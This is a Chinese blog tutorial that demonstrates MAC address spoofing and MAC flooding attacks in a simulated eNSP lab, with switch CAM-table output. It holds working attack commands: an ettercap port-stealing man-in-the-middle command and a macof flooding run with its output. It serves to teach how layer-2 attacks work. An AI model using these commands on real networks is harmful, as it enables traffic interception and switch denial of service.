MAC地址欺骗与MAC地址泛洪攻击(eNSP环境演示)

最新推荐文章于 2024-06-01 12:00:00 发布
最新推荐文章于 2024-06-01 12:00:00 发布
阅读量1.4w 收藏 87
点赞数 10
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/redwand/article/details/105388491
版权

MAC地址欺骗和MAC地址泛红攻击,是很古老的二层攻击手法,现在也很少用在网络攻击实战中,但对于其攻击原理却很值得学习,本文通过eNSP抓包的实践方式,充分学习了这两种攻击的手段,使我们对二层网络攻击有了更深刻的理解。

一、实验环境

eNSP拓扑环境
在这里插入图片描述

二、MAC地址欺骗

1、攻击原理:
MAC地址欺骗是数据链路层攻击,它是利用交换机端口学习的漏洞,通过客户端向交换机发送欺骗报文、攻击交换机的CAM表的方式,使交换机CAM表的记录与真实的主机对应MAC地址不一致,从而使交换机将报文错误转发给攻击者。
2、交换机的端口学习是如何进行的?又有何漏洞?我们实验先来了解一下。
(1)首先,我们在交换机LSW1上执行命令,清空交换机的CAM表,此时查看CAM表,内容为空。

[Huawei]undo mac-address all
[Huawei]display mac-address
[Huawei]

(2)我们从PC1上向PC2发一个构造的udp包,如图。
在这里插入图片描述
此时查看交换机的CAM表,发现已经学习了一条记录。

[Huawei]display mac-address
MAC address table of slot 0:
-------------------------------------------------------------------------------
MAC Address    VLAN/       PEVLAN CEVLAN Port            Type      LSP/LSR-ID  
               VSI/SI                                              MAC-Tunnel  
-------------------------------------------------------------------------------
5489-98dd-6106 1           -      -      Eth0/0/1        dynamic   0/-         
-------------------------------------------------------------------------------
Total matching items on slot 0 displayed = 1

我们再构造一个数据包,由PC1发给PC2,源MAC地址换成kali的MAC地址00-0c-29-6c-fc-6e。
在这里插入图片描述
再次查看交换机CAM表,发现交换机将kali的mac地址与Eht0/0/1绑定。

[Huawei]display mac-address
MAC address table of slot 0:
-------------------------------------------------------------------------------
MAC Address    VLAN/       PEVLAN CEVLAN Port            Type      LSP/LSR-ID  
               VSI/SI                                              MAC-Tunnel  
-------------------------------------------------------------------------------
000c-296c-fc6e 1           -      -      Eth0/0/1        dynamic   0/-         
5489-98dd-6106 1           -      -      Eth0/0/1        dynamic   0/-         
-------------------------------------------------------------------------------
Total matching items on slot 0 displayed = 2

由上,我们得到结论,交换机从某个端口收到一个数据包,它先读取包头中的源MAC地址,这样他就知道源MAC地址来自哪个端口,它会在CAM表中添加一条端口和MAC地址对应的记录。这种工作很高效,但如果交换机接收到了客户端伪造的源MAC地址的数据包,交换机同样也会将伪造的记录添加到CAM表中,作为信任的记录,这样就形成了MAC地址欺骗的漏洞。

【补充20200418】
上述的发包方式,虽然可以达到欺骗目的,但由于目的mac地址随机设置,交换机在接收到CAM表没有的MAC地址后,会以广播包的形式转发到网络中,这样网络中会产生大量的网络包,容易被受害者发现。因此,针对这种情况,可以将目标MAC地址设置为欺骗者本身的MAC地址,源MAC地址设置为受害者的MAC地址。同时,此过程可以使用工具ettercap实现,具体命令如下。

ettercap -T -q -M port:remote /192.168.253.164//

3、明白了交换机端口学习的原理,我们现在来伪造数据包,造成MAC地址欺骗,同时准备以下三个条件,如下图。
(1)在PC1上伪造源MAC为kali的MAC地址00-0c-29-6c-fc-6e,不停的发UDP包给PC2。
(2)在LSW1的Ehternet 0/0/1和Ethenet 0/0/3端口同时抓包。
(3)在PC2构造PC2到kali的数据包。
正常无欺骗的情况,LSW1的Ethenet 0/0/3端口可以抓到(3)过程的包。如果欺骗成功,则抓不到包,而是在LSW1的Ethenet 0/0/1端口上可以抓到该包。
在这里插入图片描述
构造的(1)过程中PC1周期发送如下图UDP报文
在这里插入图片描述
构造的(3)过程中PC2发给kali的数据包
在这里插入图片描述
LSW1的Ehternet 0/0/1抓包结果(点击下载
在这里插入图片描述
LSW1的Ehternet 0/0/3抓包结果
在这里插入图片描述
由此可见,原本由PC2发给kali的数据包,被PC1欺骗交换机后,交换机将报文转发给了PC1,这样PC1成功完成了MAC地址欺骗攻击。

三、MAC地址泛洪攻击

1、漏洞原理
每台交换机的CAM表都有最大记录条数,当交换机端口学习得到的记录大于交换机CAM表条数上限时,交换机收到一个网络帧,只要其目的站的MAC地址不存在于该交换机CAM表中,那么该帧会以广播的方式发向交换机的每一个端口,此时的交换机就相当于一个集线器HUB,我们就可以监听网络中的所有通讯报文。
2、攻击过程
以kali为攻击机,使用macof命令向网络中发送大量网络不存在的源mac地址,堵塞交换机的CAM表。

root@secwand:~#apt-get install dsniff	#安装macof
root@secwand:~# macof
de:f0:1b:1c:6f:8e ba:8d:41:6:3d:7a 0.0.0.0.25215 > 0.0.0.0.49125: S 475078686:475078686(0) win 512
ea:38:be:33:e5:aa 4d:ce:29:60:3c:2f 0.0.0.0.39934 > 0.0.0.0.238: S 1559529363:1559529363(0) win 512
b5:ea:9a:4:2d:1c 3:33:5f:73:fa:d2 0.0.0.0.58068 > 0.0.0.0.18986: S 697518561:697518561(0) win 512
31:1f:6c:72:6f:80 7c:a8:df:55:99:25 0.0.0.0.29320 > 0.0.0.0.56619: S 444895901:444895901(0) win 512
2:47:e7:37:ca:19 a9:73:33:66:61:2d 0.0.0.0.54528 > 0.0.0.0.25861: S 993143653:993143653(0) win 512
3b:75:bd:54:e7:55 4d:d1:68:4:5a:f0 0.0.0.0.28814 > 0.0.0.0.35766: S 1430997091:1430997091(0) win 512
e7:81:bb:79:4b:af df:ed:92:76:fe:79 0.0.0.0.59194 > 0.0.0.0.18284: S 1586191808:1586191808(0) win 512
9b:28:c8:4d:35:bb 4c:d2:d9:5b:3f:d0 0.0.0.0.46568 > 0.0.0.0.15767: S 1249153469:1249153469(0) win 512
13:6:d:71:2a:26 5f:82:7:70:d6:4c 0.0.0.0.41050 > 0.0.0.0.34579: S 1375163656:1375163656(0) win 512
94:cb:82:1f:a2:22 2e:4:26:69:88:cf 0.0.0.0.44712 > 0.0.0.0.33754: S 1652107051:1652107051(0) win 512
3f:7c:f7:1b:7:80 13:53:17:53:5c:c6 0.0.0.0.48520 > 0.0.0.0.34351: S 585705839:585705839(0) win 512

3、此时在交换机查看CAM表,发现表中大量陌生MAC地址记录,同时根据端口绑定可以看到绑定来自Ethernet0/0/3,说明这个攻击来自这接口。

[Huawei]display mac-address
MAC address table of slot 0:
-------------------------------------------------------------------------------
MAC Address    VLAN/       PEVLAN CEVLAN Port            Type      LSP/LSR-ID  
               VSI/SI                                              MAC-Tunnel  
-------------------------------------------------------------------------------
0050-56c0-0008 1           -      -      Eth0/0/3        dynamic   0/-         
0050-56eb-c57d 1           -      -      Eth0/0/3        dynamic   0/-         
5489-985d-0598 1           -      -      Eth0/0/2        dynamic   0/-         
5489-98dd-6106 1           -      -      Eth0/0/1        dynamic   0/-         
0050-56ef-dc6d 1           -      -      Eth0/0/3        dynamic   0/-         
000c-296c-fc6e 1           -      -      Eth0/0/3        dynamic   0/-         
feef-5464-ecad 1           -      -      Eth0/0/3        dynamic   0/-         
eaaa-9473-1926 1           -      -      Eth0/0/3        dynamic   0/-         
22a6-7027-c5f4 1           -      -      Eth0/0/3        dynamic   0/-         
7019-0f73-c876 1           -      -      Eth0/0/3        dynamic   0/-         
2eef-313b-f53f 1           -      -      Eth0/0/3        dynamic   0/-         
5682-5743-45c8 1           -      -      Eth0/0/3        dynamic   0/-         
7670-c168-505e 1           -      -      Eth0/0/3        dynamic   0/-         
8aaa-ba4f-489d 1           -      -      Eth0/0/3        dynamic   0/-         
a6a8-2d2a-73a7 1           -      -      Eth0/0/3        dynamic   0/-         
120c-2355-b4b5 1           -      -      Eth0/0/3        dynamic   0/-         
5833-be1f-0aa6 1           -      -      Eth0/0/3        dynamic   0/-         
f438-0117-c0dc 1           -      -      Eth0/0/3        dynamic   0/-         
dee0-7b40-1207 1           -      -      Eth0/0/3        dynamic   0/-         
4af0-244c-25d9 1           -      -      Eth0/0/3        dynamic   0/-         
f4d0-e92b-4fd5 1           -      -      Eth0/0/3        dynamic   0/-         
2859-7003-3924 1           -      -      Eth0/0/3        dynamic   0/-         
86ea-0825-52a2 1           -      -      Eth0/0/3        dynamic   0/-         
a4fd-c13a-8c3c 1           -      -      Eth0/0/3        dynamic   0/-         
  ---- More ----

4、实际网络攻击中,已经很少使用MAC地址泛洪攻击,当这种攻击的原理仍然值得我们学习。

redwand
关注
  • 10
    点赞
  • 87
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据链路层-mac欺骗macchanger)
m0_65247093的博客
05-23 2524
目录 0x0a 简介 0x0b 使用 0x01语法 0x02参数 0x0c 操作步骤 0x01.ip add 查看网卡(确定操作网卡eth1) 0x02.macchangger -s eth1——打印当前mac详情 0x03.sudo ifconfig eth1 down —— 关闭网卡 0x04.ip add ——》down —— 查看当前eth1网络状态 0x05.macchanger -l 打印当前已知的厂商 选取前三位 0x06.sudo macchangger -m 00..
Linux_Mac欺骗
ALL TECHNOLOGIES ARE CLOUDS
04-03 143
via: http://xmodulo.com/2014/02/spoof-mac-address-network-interface-linux.html   为什么要玩 MAC 地址欺骗? 想要理由?这里就给几个比较有技术含量的理由。 一些网络供应商会通过绑定你家路由器上的 MAC 地址来验证你的身份,这个时候如果你的路由器坏了,你怎么办?你可以暂时把你的电脑的 MAC 地址改成你家...
华为ensp模拟器实验:端口安全绑定MAC地址ip地址
最新发布
ZL_1618的博客
06-01 1133
端口安全,交换机会通过记录连接到端口的,并只允许某个MAC地址通过本端口通信。使用端口安全特性可以防止未经允许的设备访问网络,并增强安全性。另外,端口安全特性也可用于防止MAC地址造成填满。简单了解一下端口安全就行了,不说多。实验环境如下:PC1-1是为实验配置准备替换PC1来确定绑定结果的给PC1和PC2配置上ip地址后,两台PC机已经能够正常通信这是交换机未做任何配置的,只要同一网段都PC机都能够通信。
Linux 上的 MAC 地址欺骗
真理部
04-04 1529
网卡生产商在每一张网卡(NIC)在出厂时都会在上面刻上一个48位的全球唯一标识符(GUID,例如08:4f:b5:05:56:a0),这串 GUID 就是网卡的 MAC 地址,用于确定一张网卡的身份。MAC 地址的高24位叫 OUI(Organizationally Unique Identifier 组织唯一标示符),是为网卡设置 MAC 地址的组织的标识符,这样一来,不同组织设置的 MAC
MAC地址欺骗
计算机系秃头少女的博客
03-19 2010
MAC地址欺骗原理 如图所示,两个用户PcA和PcB分别连接Cisco2912的portA和portB两个端口。 PortC 00.00.CC.CC.CC.CC Internet ...
mac地址欺骗原理
热门推荐
doufuxadf的专栏
09-08 1万+
利用mac欺骗 阻止局域网内任意电脑使用网络 每个数据包 都包含了 源mac地址(发送者的mac地址) ,目标mac地址(对方的mac地址)交换机是通过mac表里mac地址和交换机端口的对应关系来传递网络数据的如果我们改变mac地址和交换机端口的对应关系 那么就能达到我们的目的了现在局域网里有2台主机主机A mac 08-10-17-25-ac-6d  主机B mac 00-04-61
ensp加kali实现arp欺骗攻击
04-21
在网络安全领域,ARP欺骗是一种常见的攻击手段,它利用了局域网中地址解析协议(ARP)的缺陷。本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网...
三、基于MAC地址划分VLAN的ensp组网
09-06
公司A、B两部门,通过SW1接入公司网络,且接入的交换机端口不固定; 两台打印机Print1和Print2,通过SW2接入公司网络,且接入的交换机端口固定。 要求:通过设置VLAN,使Print1仅能被A部门访问,Print2仅能被B部门...
基于ENSP仿真平台的IP地址与MAC地址教学设计.docx
06-05
基于ENSP仿真平台的IP地址与MAC地址教学设计.docx基于ENSP仿真平台的IP地址与MAC地址教学设计.docx基于ENSP仿真平台的IP地址与MAC地址教学设计.docx基于ENSP仿真平台的IP地址与MAC地址教学设计.docx基于ENSP仿真平台...
一、交换机MAC地址指定的ensp组网
09-06
- **VLAN与MAC地址**:在VLAN环境中,MAC地址的转发受到VLAN配置的影响。不同VLAN间的设备无法直接通信,除非配置了VLAN间路由。 通过以上内容,你应该对在ENSP中使用交换机MAC地址指定有了深入的理解。在实际工作...
eNSP网络技术与应用从基础到实战操作演示视频.zip
07-13
011.项目一:认识eNSP-任务一 012.项目一:认识eNSP-任务二 013.项目一:认识eNSP-任务三 014.项目一:认识eNSP-任务四 021.项目二:使用交换机构建简单局域网-任务一 022.项目二:使用交换机构建简单局域网-任务二 ...
网络中完美解决MAC欺骗的方案
07-14
网络中完美解决MAC欺骗的方案,从mac欺骗的原理入手,讲解了mac策略等内容。
MAC地址欺骗攻击实验
qq_45329460的博客
03-29 3381
如图,终端A和终端B、C之间通信,会在交换机的各个端口建立转发表,当终端B向终端A发送一个数据帧时,终端A会返回终端B一个响应数据(ICMP)。如下图: 当把终端A的MAC地址作为终端C的MAC时,继续向终端A发送数据帧时,终端B就会把数据从通往终端C的接口转发出去: 可以发现,虽然终端B还向终端A发送数据帧,但是因为终端C的MAC地址为终端A的,则终端B就会把数据帧往错误的发现发送,这就是MAC欺骗攻击实验。 ...
数据链路层——MAC地址欺骗泛洪
qq_49893586的博客
08-16 3908
本文讲述了在数据链路层的MAC地址欺骗泛洪攻击的原理和实验
MAC泛洪/MAC地址欺骗攻击原理介绍与操作
辉小鱼的博客
07-09 606
Client Telnet New-Client测试。Kali使用Wireshark抓包。Kali开始进行MAC泛洪攻击。查看交换机MAC地址表状态。各类交换机CAM表容量。
MAC地址泛洪欺骗模拟
qq_43698421的博客
09-21 1086
1 理论 1.1 原理 MAC地址欺骗是数据链路层攻击,它是利用交换机端口学习的漏洞,通过客户端向交换机发送欺骗报文、攻击交换机的CAM表的方式,使交换机CAM表的记录与真实的主机对应MAC地址不一致,从而使交换机将报文错误转发给攻击者。 MAC地址泛洪攻击,每台交换机的CAM表都有最大记录条数,当交换机端口学习得到的记录大于交换机CAM表条数上限时,交换机收到一个网络帧,只要其目标主机的MAC地址不存在于该交换机CAM表中,那么该帧会以广播的方式发向交换机的每一个端口,此时的交换机就相当于一个集线器HUB
二层攻击之:mac攻击
oO天龙的博客
02-20 3019
原理:交换机的MAC地址列表(也叫做CAM列表)填满后,交换机此时就像一个集线器,收到的流量数据帧会被泛洪到所有端口。 攻击方法:入侵者在PC上利用工具使大量无效源MAC地址向交换机泛洪,从而交换机MAC地址列表(也叫做CAM列表)填满。从而达到收集流量样本,或者为了发起DOS(拒绝服务)攻击。 影响:1、合法的PC(mac地址)无法在交换机的CAM列表上注册;2、交换机转发速率降低;3、
交换机mac欺骗
兼容并蓄终宽阔,若谷虚怀鱼自游
03-02 1351
创建时间:2010-01-02文章来源:Longhai文章提交:Longhai http://www.cnccie.cn/Releases/1/10010217-5.html局域网内争斗是永不停歇啊.记得最初的网络执法官-P2终结者-还有有着文雅名字的聚生网管-这现在有来了一个CnCerT.Net.Skiller汉语名字也不知道。 前面那些都是利用了ARP欺骗,不管你是欺骗网关也好欺骗PC
关于ARP、MAC、IP欺骗以及TCP劫持
收集盒 Book box
04-24 1174
>>转自:飘零的代码 piao2010 ’s blog 三个多月没更新博客,期间也有在学习和总结一些东西,只是或多或少都涉及到公司相关的信息(业务,JVM,WebServer)所以不便写出来,有时候写到一半发现又不太合适然后删除,很郁闷。之前一直比较关注web安全层面,如SQL注入、XSS、CSRF等等 ,然后HTTP协议层面,如HTTP Slowloris ,逐渐接触应用层以下(OSI
ensp模拟一次ARP泛洪攻击过程
05-17
假设有如下网络拓扑结构: ``` +-------+ +-------+ | PC1 | | PC2 | +-------+ +-------+ | | +--+--+ +--+--+ | Router | Switch +--+--+ +--+--+ | | +-------+ +-------+ | PC3 | | PC4 | +-------+ +-------+ ``` 假设攻击者控制了 PC1,想要进行 ARP 泛洪攻击攻击过程如下: 1. 攻击者向 PC2 发送一个 ARP 请求,询问 PC2 的 MAC 地址。 2. PC2 回应 ARP 请求,将自己的 MAC 地址发送给攻击者。 3. 攻击者将 PC2 的 MAC 地址缓存到自己的 ARP 缓存表中,并将该 ARP 响应广播到整个网络中。 4. 所有设备(包括 Router 和 Switch)都会接收到该 ARP 响应,因为攻击者是以广播的方式发送的,所以所有设备都会收到该消息。 5. 每个设备都会将 ARP 响应缓存到自己的 ARP 缓存表中,因为攻击者发送的 ARP 响应是伪造的,所以所有设备的 ARP 缓存表中都会记录着 PC2 的 MAC 地址与错误的 IP 地址的对应关系。 6. 当 PC3 向 PC4 发送数据包时,PC3 会向自己的 ARP 缓存表中查询 PC4 的 MAC 地址,但是由于该表中记录的是错误的 IP 地址对应的 MAC 地址,所以 PC3 无法找到正确的 MAC 地址,只能将数据包广播到整个网络中。 7. 所有设备都会接收到该数据包,但是只有 PC4 会接收并处理该数据包,因为该数据包是发往 PC4 的。 这就是 ARP 泛洪攻击的过程,攻击者通过发送伪造的 ARP 响应,将错误的 IP 地址与 MAC 地址的对应关系保存到所有设备的 ARP 缓存表中,从而实现了对整个网络的攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值